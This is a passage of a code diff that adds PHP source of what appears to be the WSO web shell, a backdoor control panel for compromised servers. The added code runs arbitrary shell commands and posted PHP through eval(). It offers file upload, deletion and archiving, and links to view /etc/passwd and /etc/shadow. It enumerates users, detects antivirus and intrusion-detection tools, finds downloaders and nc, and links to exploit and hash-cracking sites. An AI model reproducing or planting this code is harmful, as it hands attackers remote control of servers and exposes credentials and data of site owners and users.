+	function g(a,c,p1,p2,p3,charset) {
+		set(a,c,p1,p2,p3,charset);
+		d.mf.submit();
+	}
+	function a(a,c,p1,p2,p3,charset) {
+		set(a,c,p1,p2,p3,charset);
+		var params = 'ajax=true';
+		for(i=0;i<d.mf.elements.length;i++)
+			params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
+		sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
+	}
+	function sr(url, params) {
+		if (window.XMLHttpRequest)
+			req = new XMLHttpRequest();
+		else if (window.ActiveXObject)
+			req = new ActiveXObject('Microsoft.XMLHTTP');
+        if (req) {
+            req.onreadystatechange = processReqChange;
+            req.open('POST', url, true);
+            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
+            req.send(params);
+        }
+	}
+	function processReqChange() {
+		if( (req.readyState == 4) )
+			if(req.status == 200) {
+				var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
+				var arr=reg.exec(req.responseText);
+				eval(arr[2].substr(0, arr[1]));
+			} else alert('Request error!');
+	}
+</script>
+<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
+<form method=post name=mf style='display:none;'>
+<input type=hidden name=a>
+<input type=hidden name=c>
+<input type=hidden name=p1>
+<input type=hidden name=p2>
+<input type=hidden name=p3>
+<input type=hidden name=charset>
+</form>";
+	$freeSpace = @diskfreespace($GLOBALS['cwd']);
+	$totalSpace = @disk_total_space($GLOBALS['cwd']);
+	$totalSpace = $totalSpace?$totalSpace:1;
+	$release = @php_uname('r');
+	$kernel = @php_uname('s');
+	$explink = 'http://exploit-db.com/search/?action=search&filter_description=';
+	if(strpos('Linux', $kernel) !== false)
+		$explink .= urlencode('Linux Kernel ' . substr($release,0,6));
+	else
+		$explink .= urlencode($kernel . ' ' . substr($release,0,3));
+	if(!function_exists('posix_getegid')) {
+		$user = @get_current_user();
+		$uid = @getmyuid();
+		$gid = @getmygid();
+		$group = "?";
+	} else {
+		$uid = @posix_getpwuid(posix_geteuid());
+		$gid = @posix_getgrgid(posix_getegid());
+		$user = $uid['name'];
+		$uid = $uid['uid'];
+		$group = $gid['name'];
+		$gid = $gid['gid'];
+	}
+
+	$cwd_links = '';
+	$path = explode("/", $GLOBALS['cwd']);
+	$n=count($path);
+	for($i=0; $i<$n-1; $i++) {
+		$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
+		for($j=0; $j<=$i; $j++)
+			$cwd_links .= $path[$j].'/';
+		$cwd_links .= "\")'>".$path[$i]."/</a>";
+	}
+
+	$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
+	$opt_charsets = '';
+	foreach($charsets as $item)
+		$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
+
+	$m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
+	if(!empty($GLOBALS['auth_pass']))
+		$m['Logout'] = 'Logout';
+	$m['Self remove'] = 'SelfRemove';
+	$menu = '';
+	foreach($m as $k => $v)
+		$menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
+
+	$drives = "";
+	if($GLOBALS['os'] == 'win') {
+		foreach(range('c','z') as $drive)
+		if(is_dir($drive.':\\'))
+			$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
+	}
+	echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'
+       . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="' . $explink . '" target=_blank>[exploit-db.com]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=green><b>OFF</b></font>')
+       . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'
+       . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'
+       . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
+}
+
+function wsoFooter() {
+	$is_writable = is_writable($GLOBALS['cwd'])?" <font color='green'>(Writeable)</font>":" <font color=red>(Not writable)</font>";
+    echo "
+</div>
+<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
+	<tr>
+		<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
+		<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
+	</tr><tr>
+		<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
+		<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
+	</tr><tr>
+		<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
+		<td><form method='post' ENCTYPE='multipart/form-data'>
+		<input type=hidden name=a value='FilesMAn'>
+		<input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
+		<input type=hidden name=p1 value='uploadFile'>
+		<input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
+		<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
+	</tr></table></div></body></html>";
+}
+
+if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {
+    function posix_getpwuid($p) {return false;} }
+if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {
+    function posix_getgrgid($p) {return false;} }
+
+function wsoEx($in) {
+	$out = '';
+	if (function_exists('exec')) {
+		@exec($in,$out);
+		$out = @join("\n",$out);
+	} elseif (function_exists('passthru')) {
+		ob_start();
+		@passthru($in);
+		$out = ob_get_clean();
+	} elseif (function_exists('system')) {
+		ob_start();
+		@system($in);
+		$out = ob_get_clean();
+	} elseif (function_exists('shell_exec')) {
+		$out = shell_exec($in);
+	} elseif (is_resource($f = @popen($in,"r"))) {
+		$out = "";
+		while(!@feof($f))
+			$out .= fread($f,1024);
+		pclose($f);
+	}
+	return $out;
+}
+
+function wsoViewSize($s) {
+	if($s >= 1073741824)
+		return sprintf('%1.2f', $s / 1073741824 ). ' GB';
+	elseif($s >= 1048576)
+		return sprintf('%1.2f', $s / 1048576 ) . ' MB';
+	elseif($s >= 1024)
+		return sprintf('%1.2f', $s / 1024 ) . ' KB';
+	else
+		return $s . ' B';
+}
+
+function wsoPerms($p) {
+	if (($p & 0xC000) == 0xC000)$i = 's';
+	elseif (($p & 0xA000) == 0xA000)$i = 'l';
+	elseif (($p & 0x8000) == 0x8000)$i = '-';
+	elseif (($p & 0x6000) == 0x6000)$i = 'b';
+	elseif (($p & 0x4000) == 0x4000)$i = 'd';
+	elseif (($p & 0x2000) == 0x2000)$i = 'c';
+	elseif (($p & 0x1000) == 0x1000)$i = 'p';
+	else $i = 'u';
+	$i .= (($p & 0x0100) ? 'r' : '-');
+	$i .= (($p & 0x0080) ? 'w' : '-');
+	$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
+	$i .= (($p & 0x0020) ? 'r' : '-');
+	$i .= (($p & 0x0010) ? 'w' : '-');
+	$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
+	$i .= (($p & 0x0004) ? 'r' : '-');
+	$i .= (($p & 0x0002) ? 'w' : '-');
+	$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
+	return $i;
+}
+
+function wsoPermsColor($f) {
+	if (!@is_readable($f))
+		return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
+	elseif (!@is_writable($f))
+		return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
+	else
+		return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
+}
+
+function wsoScandir($dir) {
+    if(function_exists("scandir")) {
+        return scandir($dir);
+    } else {
+        $dh  = opendir($dir);
+        while (false !== ($filename = readdir($dh)))
+            $files[] = $filename;
+        return $files;
+    }
+}
+
+function wsoWhich($p) {
+	$path = wsoEx('which ' . $p);
+	if(!empty($path))
+		return $path;
+	return false;
+}
+
+function actionSecInfo() {
+	wsoHeader();
+	echo '<h1>Server security information</h1><div class=content>';
+	function wsoSecParam($n, $v) {
+		$v = trim($v);
+		if($v) {
+			echo '<span>' . $n . ': </span>';
+			if(strpos($v, "\n") === false)
+				echo $v . '<br>';
+			else
+				echo '<pre class=ml1>' . $v . '</pre>';
+		}
+	}
+
+	wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
+    if(function_exists('apache_get_modules'))
+        wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
+	wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
+	wsoSecParam('Open base dir', @ini_get('open_basedir'));
+	wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
+	wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
+	wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
+	$temp=array();
+	if(function_exists('mysql_get_client_info'))
+		$temp[] = "MySql (".mysql_get_client_info().")";
+	if(function_exists('mssql_connect'))
+		$temp[] = "MSSQL";
+	if(function_exists('pg_connect'))
+		$temp[] = "PostgreSQL";
+	if(function_exists('oci_connect'))
+		$temp[] = "Oracle";
+	wsoSecParam('Supported databases', implode(', ', $temp));
+	echo '<br>';
+
+	if($GLOBALS['os'] == 'nix') {
+            wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
+            wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
+            wsoSecParam('OS version', @file_get_contents('/proc/version'));
+            wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
+            if(!$GLOBALS['safe_mode']) {
+                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
+                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
+                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
+                echo '<br>';
+                $temp=array();
+                foreach ($userful as $item)
+                    if(wsoWhich($item))
+                        $temp[] = $item;
+                wsoSecParam('Userful', implode(', ',$temp));
+                $temp=array();
+                foreach ($danger as $item)
+                    if(wsoWhich($item))
+                        $temp[] = $item;
+                wsoSecParam('Danger', implode(', ',$temp));
+                $temp=array();
+                foreach ($downloaders as $item)
+                    if(wsoWhich($item))
+                        $temp[] = $item;
+                wsoSecParam('Downloaders', implode(', ',$temp));
+                echo '<br/>';
+                wsoSecParam('HDD space', wsoEx('df -h'));
+                wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
+                echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
+                if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
+                    $temp = "";
+                    for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
+                        $uid = @posix_getpwuid($_POST['p2']);
+                        if ($uid)
+                            $temp .= join(':',$uid)."\n";
+                    }
+                    echo '<br/>';
+                    wsoSecParam('Users', $temp);
+                }
+            }
+	} else {
+		wsoSecParam('OS Version',wsoEx('ver'));
+		wsoSecParam('Account Settings',wsoEx('net accounts'));
+		wsoSecParam('User Accounts',wsoEx('net user'));
+	}
+	echo '</div>';
+	wsoFooter();
+}
+
+function actionPhp() {
+	if(isset($_POST['ajax'])) {
+        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
+		ob_start();
+		eval($_POST['p1']);
+		$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
+		echo strlen($temp), "\n", $temp;
+		exit;
+	}
+    if(empty($_POST['ajax']) && !empty($_POST['p1']))
+        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);
+
+	wsoHeader();
+	if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
+		echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
+		ob_start();
+		phpinfo();
+		$tmp = ob_get_clean();
+        $tmp = preg_replace(array (
+            '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU',
+            '!td, th {(.*)}!msiU',
+            '!<img[^>]+>!msiU',
+        ), array (
+            '',
+            '.e, .v, .h, .h th {$1}',
+            ''
+        ), $tmp);
+		echo str_replace('<h1','<h2', $tmp) .'</div><br>';
+	}
+    echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
+	echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
+	if(!empty($_POST['p1'])) {
+		ob_start();
+		eval($_POST['p1']);
+		echo htmlspecialchars(ob_get_clean());
+	}
+	echo '</pre></div>';
+	wsoFooter();
+}
+
+function actionFilesMan() {
+    if (!empty ($_COOKIE['f']))
+        $_COOKIE['f'] = @unserialize($_COOKIE['f']);
+    
+	if(!empty($_POST['p1'])) {
+		switch($_POST['p1']) {
+			case 'uploadFile':
+				if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
+					echo "Can't upload file!";
+				break;
+			case 'mkdir':
+				if(!@mkdir($_POST['p2']))
+					echo "Can't create new dir";
+				break;
+			case 'delete':
+				function deleteDir($path) {
+					$path = (substr($path,-1)=='/') ? $path:$path.'/';
+					$dh  = opendir($path);
+					while ( ($item = readdir($dh) ) !== false) {
+						$item = $path.$item;
+						if ( (basename($item) == "..") || (basename($item) == ".") )
+							continue;
+						$type = filetype($item);
+						if ($type == "dir")
+							deleteDir($item);
+						else
+							@unlink($item);
+					}
+					closedir($dh);
+					@rmdir($path);
+				}
+				if(is_array(@$_POST['f']))
+					foreach($_POST['f'] as $f) {
+                        if($f == '..')
+                            continue;
+						$f = urldecode($f);
+						if(is_dir($f))
+							deleteDir($f);
+						else
+							@unlink($f);
+					}
+				break;
+			case 'paste':
+				if($_COOKIE['act'] == 'copy') {
+					function copy_paste($c,$s,$d){
+						if(is_dir($c.$s)){
+							mkdir($d.$s);
+							$h = @opendir($c.$s);
+							while (($f = @readdir($h)) !== false)
+								if (($f != ".") and ($f != ".."))
+									copy_paste($c.$s.'/',$f, $d.$s.'/');
+						} elseif(is_file($c.$s))
+							@copy($c.$s, $d.$s);
+					}
+					foreach($_COOKIE['f'] as $f)
+						copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);
+				} elseif($_COOKIE['act'] == 'move') {
+					function move_paste($c,$s,$d){
+						if(is_dir($c.$s)){
+							mkdir($d.$s);
+							$h = @opendir($c.$s);
+							while (($f = @readdir($h)) !== false)
+								if (($f != ".") and ($f != ".."))
+									copy_paste($c.$s.'/',$f, $d.$s.'/');
+						} elseif(@is_file($c.$s))
+							@copy($c.$s, $d.$s);
+					}
+					foreach($_COOKIE['f'] as $f)
+						@rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
+				} elseif($_COOKIE['act'] == 'zip') {
+					if(class_exists('ZipArchive')) {
+                        $zip = new ZipArchive();
+                        if ($zip->open($_POST['p2'], 1)) {
+                            chdir($_COOKIE['c']);
+                            foreach($_COOKIE['f'] as $f) {
+                                if($f == '..')
+                                    continue;
+                                if(@is_file($_COOKIE['c'].$f))
+                                    $zip->addFile($_COOKIE['c'].$f, $f);
+                                elseif(@is_dir($_COOKIE['c'].$f)) {
+                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
+                                    foreach ($iterator as $key=>$value) {
+                                        $zip->addFile(realpath($key), $key);
+                                    }
+                                }
+                            }
+                            chdir($GLOBALS['cwd']);
+                            $zip->close();
+                        }
+                    }
+				} elseif($_COOKIE['act'] == 'unzip') {
+					if(class_exists('ZipArchive')) {
+                        $zip = new ZipArchive();
+                        foreach($_COOKIE['f'] as $f) {
+                            if($zip->open($_COOKIE['c'].$f)) {
+                                $zip->extractTo($GLOBALS['cwd']);
+                                $zip->close();
+                            }
+                        }
+                    }
+				} elseif($_COOKIE['act'] == 'tar') {
+                    chdir($_COOKIE['c']);
+                    $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
+                    wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
+                    chdir($GLOBALS['cwd']);
+				}
+				unset($_COOKIE['f']);
+                setcookie('f', '', time() - 3600);
+				break;
+			default:
+                if(!empty($_POST['p1'])) {
+					WSOsetcookie('act', $_POST['p1']);
+					WSOsetcookie('f', serialize(@$_POST['f']));
+					WSOsetcookie('c', @$_POST['c']);
+				}
+				break;
+		}
+	}
+    wsoHeader();
+	echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
+	$dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
+	if($dirContent === false) {	echo 'Can\'t open this folder!';wsoFooter(); return; }
+	global $sort;
+	$sort = array('name', 1);
+	if(!empty($_POST['p1'])) {
+		if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
+			$sort = array($match[1], (int)$match[2]);
+	}
+echo "<script>
+	function sa() {
+		for(i=0;i<d.files.elements.length;i++)
+			if(d.files.elements[i].type == 'checkbox')
+				d.files.elements[i].checked = d.files.elements[0].checked;
+	}
+</script>
+<table width='100%' class='main' cellspacing='0' cellpadding='2'>
+<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
+	$dirs = $files = array();
+	$n = count($dirContent);
+	for($i=0;$i<$n;$i++) {
+		$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
+		$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
+		$tmp = array('name' => $dirContent[$i],
+					 'path' => $GLOBALS['cwd'].$dirContent[$i],
+					 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
+					 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
+					 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
+					 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
+					 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
+					);
+		if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
+			$files[] = array_merge($tmp, array('type' => 'file'));
+		elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
+			$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
+		elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != "."))
+			$dirs[] = array_merge($tmp, array('type' => 'dir'));
+	}
+	$GLOBALS['sort'] = $sort;
+	function wsoCmp($a, $b) {
+		if($GLOBALS['sort'][0] != 'size')
+			return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
+		else
+			return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
+	}
+	usort($files, "wsoCmp");
+	usort($dirs, "wsoCmp");
+	$files = array_merge($dirs, $files);
+	$l = 0;
+	foreach($files as $f) {
+		echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
+			.'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
+		$l = $l?0:1;
+	}
+	echo "<tr><td colspan=7>
+	<input type=hidden name=a value='FilesMan'>
+	<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
+	<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
+	<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
+    if(class_exists('ZipArchive'))
+        echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
+    echo "<option value='tar'>Compress (tar.gz)</option>";
+    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))
+        echo "<option value='paste'>Paste / Compress</option>";
+    echo "</select>&nbsp;";
+    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
+        echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;";
+    echo "<input type='submit' value='>>'></td></tr></form></table></div>";
+	wsoFooter();
+}
+
+function actionStringTools() {
+	if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
+    if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
+	if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
+	if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
+	if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
+	$stringTools = array(
+		'Base64 encode' => 'base64_encode',
+		'Base64 decode' => 'base64_decode',
+		'Url encode' => 'urlencode',
+		'Url decode' => 'urldecode',
+		'Full urlencode' => 'full_urlencode',
+		'md5 hash' => 'md5',
+		'sha1 hash' => 'sha1',
+		'crypt' => 'crypt',
+		'CRC32' => 'crc32',
+		'ASCII to HEX' => 'ascii2hex',
+		'HEX to ASCII' => 'hex2ascii',
+		'HEX to DEC' => 'hexdec',
+		'HEX to BIN' => 'hex2bin',
+		'DEC to HEX' => 'dechex',
+		'DEC to BIN' => 'decbin',
+		'BIN to HEX' => 'binhex',
+		'BIN to DEC' => 'bindec',
+		'String to lower case' => 'strtolower',
+		'String to upper case' => 'strtoupper',
+		'Htmlspecialchars' => 'htmlspecialchars',
+		'String length' => 'strlen',
+	);
+	if(isset($_POST['ajax'])) {
+		WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true);
+		ob_start();
+		if(in_array($_POST['p1'], $stringTools))
+			echo $_POST['p1']($_POST['p2']);
+		$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
+		echo strlen($temp), "\n", $temp;
+		exit;
+	}
+    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
+		WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0);
+	wsoHeader();
+	echo '<h1>String conversions</h1><div class=content>';
+	echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
+	foreach($stringTools as $k => $v)
+		echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
+		echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
+	if(!empty($_POST['p1'])) {
+		if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
+	}
+	echo"</pre></div><br><h1>Search files:</h1><div class=content>
+		<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
+			<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
+			<tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
+			<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
+			<tr><td></td><td><input type='submit' value='>>'></td></tr>
+			</table></form>";
+
+	function wsoRecursiveGlob($path) {
+		if(substr($path, -1) != '/')
+			$path.='/';
+		$paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
+		if(is_array($paths)&&@count($paths)) {
+			foreach($paths as $item) {
+				if(@is_dir($item)){
+					if($path!=$item)
+						wsoRecursiveGlob($item);
+				} else {
+					if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false)
+						echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\",\"\")'>".htmlspecialchars($item)."</a><br>";
+				}
+			}
+		}
+	}
+	if(@$_POST['p3'])
+		wsoRecursiveGlob($_POST['c']);
+	echo "</div><br><h1>Search for hash:</h1><div class=content>
+		<form method='post' target='_blank' name='hf'>
+			<input type='text' name='hash' style='width:200px;'><br>
+            <input type='hidden' name='act' value='find'/>
+			<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
+			<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
